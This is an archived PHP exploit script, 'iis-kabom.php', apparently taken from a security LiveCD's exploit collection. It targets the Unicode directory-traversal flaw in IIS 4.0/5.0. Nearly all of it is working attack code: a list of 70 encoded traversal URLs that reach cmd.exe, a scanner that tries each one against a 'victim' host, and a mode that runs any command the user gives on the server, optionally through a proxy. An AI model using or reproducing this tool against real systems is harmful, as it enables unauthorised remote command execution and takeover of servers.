home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / microsoft / remote / iis-kabom.php < prev    next >
Encoding:
Text File  |  2005-02-12  |  14.5 KB  |  328 lines
  1. #!php -q
  2. <?
  3.  
  4. $vector_ataque[0]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
  5.  
  6. $vector_ataque[1]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
  7.  
  8. $vector_ataque[2]="/msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  9.  
  10. $vector_ataque[3]="/msadc/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
  11.  
  12. $vector_ataque[4]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
  13.  
  14. $vector_ataque[5]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
  15.  
  16. $vector_ataque[6]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
  17.  
  18. $vector_ataque[7]="/msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+";
  19.  
  20. $vector_ataque[8]="/msadc/..%%35c../..%%35c../..%%35c../winnt/system32/cmd.exe?/c+";
  21.  
  22. $vector_ataque[9]="/msadc/..%%35%63../..%%35%63../..%%35%63../winnt/system32/cmd.exe?/c+";
  23.  
  24. $vector_ataque[10]="/msadc/..%25%35%63../..%25%35%63../..%25%35%63../winnt/system32/cmd.exe?/c+";
  25.  
  26. $vector_ataque[11]="/MSADC/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  27.  
  28. $vector_ataque[12]="/MSADC/..%%35c..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
  29.  
  30. $vector_ataque[13]="/MSADC/..%%35%63..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
  31.  
  32. $vector_ataque[14]="/MSADC/..%25%35%63..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
  33.  
  34. $vector_ataque[15]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
  35.  
  36. $vector_ataque[16]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
  37.  
  38. $vector_ataque[17]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
  39.  
  40. $vector_ataque[18]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
  41.  
  42. $vector_ataque[19]="/PBServer/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  43.  
  44. $vector_ataque[20]="/PBServer/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
  45.  
  46. $vector_ataque[21]="/PBServer/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
  47.  
  48. $vector_ataque[22]="/PBServer/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
  49.  
  50. $vector_ataque[23]="/Rpc/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  51.  
  52. $vector_ataque[24]="/Rpc/..%%35c..%%35c..%%35cwinnt/system32/cmd.exe?/c+";
  53.  
  54. $vector_ataque[25]="/Rpc/..%%35%63..%%35%63..%%35%63winnt/system32/cmd.exe?/c+";
  55.  
  56. $vector_ataque[26]="/Rpc/..%25%35%63..%25%35%63..%25%35%63winnt/system32/cmd.exe?/c+";
  57.  
  58. $vector_ataque[27]="/_vti_bin/..%255c..%255c..%255c..%255c..%255c../winnt/system32/cmd.exe?/c+";
  59.  
  60. $vector_ataque[28]="/_vti_bin/..%%35c..%%35c..%%35c..%%35c..%%35c../winnt/system32/cmd.exe?/c+";
  61.  
  62. $vector_ataque[29]="/_vti_bin/..%%35%63..%%35%63..%%35%63..%%35%63..%%35%63../winnt/system32/cmd.exe?/c+";
  63.  
  64. $vector_ataque[30]="/_vti_bin/..%25%35%63..%25%35%63..%25%35%63..%25%35%63..%25%35%63../winnt/system32/cmd.exe?/c+";
  65.  
  66. $vector_ataque[31]="/samples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  67.  
  68. $vector_ataque[32]="/cgi-bin/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  69.  
  70. $vector_ataque[33]="/iisadmpwd/..%252f..%252f..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
  71.  
  72. $vector_ataque[34]="/_vti_cnf/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  73.  
  74. $vector_ataque[35]="/adsamples/..%255c..%255c..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+";
  75.  
  76. $vector_ataque[36]="/scripts/..%C1%1C..%C1%1C..%C1%1C..%C1%1Cwinnt/system32/cmd.exe?/c+";
  77.  
  78. $vector_ataque[37]="/scripts/..%C1%9C..%C1%9C..%C1%9C..%C1%9Cwinnt/system32/cmd.exe?/c+";
  79.  
  80. $vector_ataque[38]="/scripts/..%C0%AF..%C0%AF..%C0%AF..%C0%AFwinnt/system32/cmd.exe?/c+";
  81.  
  82. $vector_ataque[39]="/scripts/..%252f..%252f..%252f..%252fwinnt/system32/cmd.exe?/c+";
  83.  
  84. $vector_ataque[40]="/scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+";
  85.  
  86. $vector_ataque[41]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
  87.  
  88. $vector_ataque[42]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
  89.  
  90. $vector_ataque[43]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
  91.  
  92. $vector_ataque[44]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
  93.  
  94. $vector_ataque[45]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
  95.  
  96. $vector_ataque[46]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
  97.  
  98. $vector_ataque[47]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
  99.  
  100. $vector_ataque[48]="/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
  101.  
  102. $vector_ataque[49]="/_vti_bin/..%c0%af../..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+";
  103.  
  104. $vector_ataque[50]="/scripts/..%c0%af../winnt/system32/cmd.exe?/c+";
  105.  
  106. $vector_ataque[51]="/scripts..%c1%9c../winnt/system32/cmd.exe?/c+";
  107.  
  108. $vector_ataque[52]="/scripts/..%c1%pc../winnt/system32/cmd.exe?/c+";
  109.  
  110. $vector_ataque[53]="/scripts/..%c0%9v../winnt/system32/cmd.exe?/c+";
  111.  
  112. $vector_ataque[54]="/scripts/..%c0%qf../winnt/system32/cmd.exe?/c+";
  113.  
  114. $vector_ataque[55]="/scripts/..%c1%8s../winnt/system32/cmd.exe?/c+";
  115.  
  116. $vector_ataque[56]="/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+";
  117.  
  118. $vector_ataque[57]="/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+";
  119.  
  120. $vector_ataque[58]="/scripts/..%c1%af../winnt/system32/cmd.exe?/c+";
  121.  
  122. $vector_ataque[59]="/scripts/..%e0%80%af../winnt/system32/cmd.exe?/c+";
  123.  
  124. $vector_ataque[60]="/scripts/..%f0%80%80%af../winnt/system32/cmd.exe?/c+";
  125.  
  126. $vector_ataque[61]="/scripts/..%f8%80%80%80%af../winnt/system32/cmd.exe?/c+";
  127.  
  128. $vector_ataque[62]="/scripts/..%fc%80%80%80%80%af../winnt/system32/cmd.exe?/c+";
  129.  
  130. $vector_ataque[63]="/msadc/..\%e0\%80\%af../..\%e0\%80\%af../..\%e0\%80\%af../winnt/system32/cmd.exe\?/c+";
  131.  
  132. $vector_ataque[64]="/cgi-bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  133.  
  134. $vector_ataque[65]="/samples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  135.  
  136. $vector_ataque[66]="/iisadmpwd/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  137.  
  138. $vector_ataque[67]="/_vti_cnf/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  139.  
  140. $vector_ataque[68]="/_vti_bin/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  141.  
  142. $vector_ataque[69]="/adsamples/..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af../winnt/system32/cmd.exe?/c+";
  143.         if(!isset($argv[1]))
  144.         {
  145.                 echo
  146.  
  147. "\n\n--------------------------------------------------------------------\n";
  148.                 echo "------------- (c) UNICODE exploit for IIS 5.0/4.0 by BoloTron
  149. ------\n";
  150.                 echo
  151. "--------------------------------------------------------------------\n\n";
  152.                 echo "Usage of the wicked device:\n";
  153.                 echo $argv[0]." -t www.victim.vic\n";
  154.                 echo $argv[0]." -t www.victim.vic -p proxy:port\n";
  155.                 echo $argv[0]."  www.victim.vic comand variant_number\n";
  156.                 echo $argv[0]." -p proxy:port www.victim.vic comand variant_number\n";
  157.                 echo "Options:\n";
  158.                 echo "-t --> Test the vulnerability (Try known variants till find the good
  159. one)\n";
  160.                 echo "-p --> Attack through proxy\n";
  161.                 echo "\nUse Mode:\n1) Test the host and get the variants number in case
  162. vulnerability exists\n";
  163.                 echo "2) Attack with command and variants number (optionaly you can use
  164. proxy)\n";
  165.                 echo "Note : When you specify a command with spaces, replace spaces
  166. with low script  \"_\" \n";
  167.                 echo "and you must double the backslash \"\\\". \n
  168. Example".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
  169.                 echo "Thanks to An-tonio for the proxy support.\n";
  170.                 echo "Bug discover by Anonymous Post.\n";
  171.                 echo "TYPE ".$argv[0]." spanish, for Spanish help.\n";
  172.         }
  173.         else
  174.         {
  175.                 if($argv[1]=="spanish")
  176.                 {
  177.                 echo
  178. "\n\n--------------------------------------------------------------------\n";
  179.                 echo "------------- (c) Exploit UNICODE para IIS 5.0/4.0 por
  180. BoloTron ----\n";
  181.                 echo
  182. "--------------------------------------------------------------------\n\n";
  183.                 echo "Uso del artefacto maligno :\n";
  184.  
  185.                 echo $argv[0]." -t www.victima.vic\n";
  186.                 echo $argv[0]." -t www.victima.vic -p proxy:puerto\n";
  187.                 echo $argv[0]."  www.victima.vic comando n║_de_variante\n";
  188.                 echo $argv[0]." -p proxy:port www.victima.vic comand
  189. n║_de_variante\n";
  190.                 echo "Opciones:\n";
  191.                 echo "-t --> Testea la vulnerabilidad, prueba todas las
  192. variantes hasta encontrar una buena.\n";
  193.                 echo "-p --> Ataque a traves de proxy\n";
  194.                 echo "\nModo de Empleo:\n1) Testear el host y anotar el
  195. numero de variante en caso de ser vulnerable\n";
  196.                 echo "2) Atacar especificando comando y n║ de variante
  197. (opcionalmente puedes especificar un proxy)\n";
  198.                 echo "Nota : Cuando se especifica un comando en el que hay
  199. espacios hay que sustituirlos por un guion bajo _ \n";
  200.                 echo "y las contrabarras hay que ponerlas dobles. \nEjemplo :
  201. ".$argv[0]." -p proxy.prx:3128 www.victima.com dir_c:\\\\inetpub 49\n";
  202.                 echo "Gracias a An-tonio por sus indicaciones en el soporte proxy.\n";
  203.                 echo "Bug descubierto por aviso anonimo.\n";
  204.                 exit;
  205.                 }
  206.                 if($argv[1]=="-t")
  207.                 {
  208.                         if ($argv[3]=="-p")
  209.                         {
  210.                         for($i=0;$i<70;$i++)
  211.                         {
  212.                                 $prox=explode(":",$argv[4]);
  213.                                 $comando="dir+c:\\";
  214.                                 $fp = fsockopen($prox[0], $prox[1]);
  215.                                 if(!$fp)
  216.                                 {
  217.                                         echo "Conection failed...\n";
  218.                                 }
  219.                                 else
  220.                                 {
  221.                                         fputs($fp,"GET
  222. http://".$argv[2]."".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
  223.                                         echo "Trying variant number ".$i." ";
  224.                                         while(!feof($fp))
  225.                                         {
  226.                                                 $resul=$resul.fgets($fp,128);
  227.                                         }
  228.                                         if (ereg("<DIR>", $resul))
  229.                                         {
  230.                                                 echo "-----> Vulnerable!!\n";
  231.                                                 exit;
  232.                                         }
  233.                                         else
  234.                                         {
  235.                                                 echo "-----> NoT Vulnerable
  236. :(\n";
  237.                                         }
  238.  
  239.                                 }
  240.                                 fclose($fp);
  241.                         }
  242.                         }
  243.                         else
  244.                         {
  245.                         for($i=0;$i<70;$i++)
  246.                         {
  247.                                 $port=80;
  248.                                 $comando="dir+c:\\";
  249.                                 $fp = fsockopen($argv[2], $port);
  250.                                 if(!$fp)
  251.                                 {
  252.                                         echo "Conection failed...\n";
  253.                                 }
  254.                                 else
  255.                                 {
  256.                                         fputs($fp,"GET
  257. ".$vector_ataque[$i]."".$comando." HTTP/1.0\n\n");
  258.                                         echo "Trying variant number ".$i." ";
  259.                                         while(!feof($fp))
  260.                                         {
  261.                                                 $resul=$resul.fgets($fp,128);
  262.                                         }
  263.                                         if (ereg("<DIR>", $resul))
  264.                                         {
  265.                                                 echo "-----> vulnerable!!\n";
  266.                                                 exit;
  267.                                         }
  268.                                         else
  269.                                         {
  270.                                                 echo "-----> No Vulnerable :(\n";
  271.                                         }
  272.  
  273.                                 }
  274.                                 fclose($fp);
  275.                         }
  276.                         }
  277.                 }
  278.                 else
  279.                 {
  280.                         if($argv[1]=="-p")
  281.                         {
  282.                                 $prox=explode(":",$argv[2]);
  283.                                 $port=$prox[1];
  284.                                 $comando=ereg_replace("_","+",$argv[4]);
  285.                                 $fp = fsockopen($prox[0], $port);
  286.  
  287.                                 if(!$fp)
  288.                                 {
  289.                                         echo "Conection failed.\n";
  290.                                 }
  291.                                 else
  292.                                 {
  293.                                         fputs($fp,"GET
  294. http://".$argv[3]."".$vector_ataque[$argv[5]]."".$comando." HTTP/1.0\n\n");
  295.                                         while(!feof($fp))
  296.                                         {
  297.                                                 echo fgets($fp,128);
  298.                                         }
  299.                                 }
  300.                                 fclose($fp);
  301.  
  302.                         }
  303.                         else
  304.                         {
  305.                                 $port=80;
  306.                                 $comando=ereg_replace("_","+",$argv[2]);
  307.                                 $fp = fsockopen($argv[1], $port);
  308.                                 if(!$fp)
  309.                                 {
  310.                                         echo "Conection failed.\n";
  311.                                 }
  312.                                 else
  313.                                 {
  314.                                         fputs($fp,"GET ".$vector_ataque[$argv[3]]."".$comando." HTTP/1.0\n\n");
  315.                                         while(!feof($fp))
  316.                                         {
  317.                                                 echo fgets($fp,128);
  318.                                         }
  319.                                 }
  320.                                 fclose($fp);
  321.                         }
  322.                 }
  323.  
  324.  
  325.  
  326.  
  327.         }
  328. ?>